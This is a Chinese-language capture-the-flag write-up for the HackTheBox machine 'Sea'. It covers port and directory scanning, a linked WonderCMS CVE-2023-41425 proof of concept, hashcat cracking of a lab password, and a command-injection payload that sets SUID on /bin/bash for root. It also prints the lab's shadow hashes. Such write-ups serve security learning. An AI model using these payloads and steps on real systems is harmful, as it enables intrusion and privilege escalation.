基本信息

https://app.hackthebox.com/machines/Sea
10.10.11.28

端口扫描

22，80:

$ nmap -sC -sV -Pn 10.10.11.28
Starting Nmap 7.95 ( https://nmap.org ) at 2024-08-12 13:20 CST
Nmap scan report for 10.10.11.28
Host is up (0.095s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
|   256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_  256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp    open     http           Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Sea - Home
593/tcp   filtered http-rpc-epmap
749/tcp   filtered kerberos-adm
2301/tcp  filtered compaqdiag
2557/tcp  filtered nicetec-mgmt
6129/tcp  filtered unknown
10003/tcp filtered documentum_s
49156/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.13 seconds

80

直接ip访问没什么东西，how-to-participate里可以看到http://sea.htb/contact.php链接：

sea.htb

添加hosts后访问,一个提交信息的页面：

1	10.10.11.28 sea.htb

测试提交url，能收到自动访问：

目录扫描

字典要稍微大点，一层层

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/big.txt  -t 50 -u http://sea.htb/

/0                    (Status: 200) [Size: 3650]
/404                  (Status: 200) [Size: 3341]
/data                 (Status: 301) [Size: 228] [--> http://sea.htb/data/]
/home                 (Status: 200) [Size: 3650]
/messages             (Status: 301) [Size: 232] [--> http://sea.htb/messages/]
/plugins              (Status: 301) [Size: 231] [--> http://sea.htb/plugins/]
/themes               (Status: 301) [Size: 230] [--> http://sea.htb/themes/]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/big.txt  -t 50 -u http://sea.htb/themes/

/404                  (Status: 200) [Size: 3341]
/bike                 (Status: 301) [Size: 235] [--> http://sea.htb/themes/bike/]
/home                 (Status: 200) [Size: 3650]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/big.txt  -t 50 -u http://sea.htb/themes/bike/

/404                  (Status: 200) [Size: 3341]
/LICENSE              (Status: 200) [Size: 1067]
/css                  (Status: 301) [Size: 239] [--> http://sea.htb/themes/bike/css/]
/home                 (Status: 200) [Size: 3650]
/img                  (Status: 301) [Size: 239] [--> http://sea.htb/themes/bike/img/]
/summary              (Status: 200) [Size: 66]
/version              (Status: 200) [Size: 6]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/Roundcube-123.txt  -t 50 -u http://sea.htb/themes/bike/

/LICENSE              (Status: 200) [Size: 1067]
/README.md            (Status: 200) [Size: 318]

根据readme知道是WonderCMS：

WonderCMS

然后根据WonderCMS，搜到相关漏洞：

WonderCMS/wondercms: Fast and small flat file CMS (5 files). Built with PHP, JSON database.
https://github.com/WonderCMS/wondercms
CVE-2023-41425 (WonderCMS Remote Code Execution) - PoC
https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

我们在contat那里也可以看到会自动访问我们提交的URL，所以可以利用这个漏洞

需要自己改一下代码，exp是从github下载zip，改成从自己机器，生成的URL提交，打到www-data:

信息

常规翻文件得到密码hash：

1	$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q

可以破解出密码：

1
2
3

sudo hashcat -m 3200 hash.txt ~/Tools/dict/rockyou.txt

mychemicalromance

user flag

amay用户可以用这个密码ssh登录：

System Monitor

查看端口可以发现本地的8080，转发出来访问需要登录，amay的账号密码可以登录，是一个System Monitor：

ssh amay@10.10.11.28 -L 8081:127.0.0.1:8080

amay
mychemicalromance

简单测试就可以发现很基础的命令注入，root权限执行：

提权 & root flag

简单的直接给bash加suid：

1	log_file=%2Fvar%2Flog%2Fapache2%2Faccess.log`chmod+%2Bs+/bin/bash`&analyze_log=

shadow

1
2
3

root:$6$llVzHhr7xHrvx1wJ$gH0PLbyPaIOqLrpjpzGZbM2bZ/iHaOfv/bj1YRrktVeZ8.1KQ0Jr1Rv/TL/3Qdh84Fwec1UhX2v0LVAGsuzq.0:19775:0:99999:7:::
amay:$6$S1AGe5ex2k4D5MKa$gTclSeJwvND3FINpZaK0zfUqk6T9IkhlxCn17fNWLx56u.zP/f/4e5YrJRPsM3TRuuKXQDfYL44RyPzduexsm.:19775:0:99999:7:::
geo:$6$5mAIqOze4GJ4s9Zu$P3IgUSHlcCkKpDJ0862IgP5aqaNilEUZDGIm16FiWdxh1A5dfKjmwhMgp3xctHiHZVWGtmKY25cCrILanDPaG.:19934:0:99999:7:::

参考资料

WonderCMS/wondercms: Fast and small flat file CMS (5 files). Built with PHP, JSON database.
https://github.com/WonderCMS/wondercms
CVE-2023-41425 (WonderCMS Remote Code Execution) - PoC
https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

Sea - HackTheBox

2024-08-12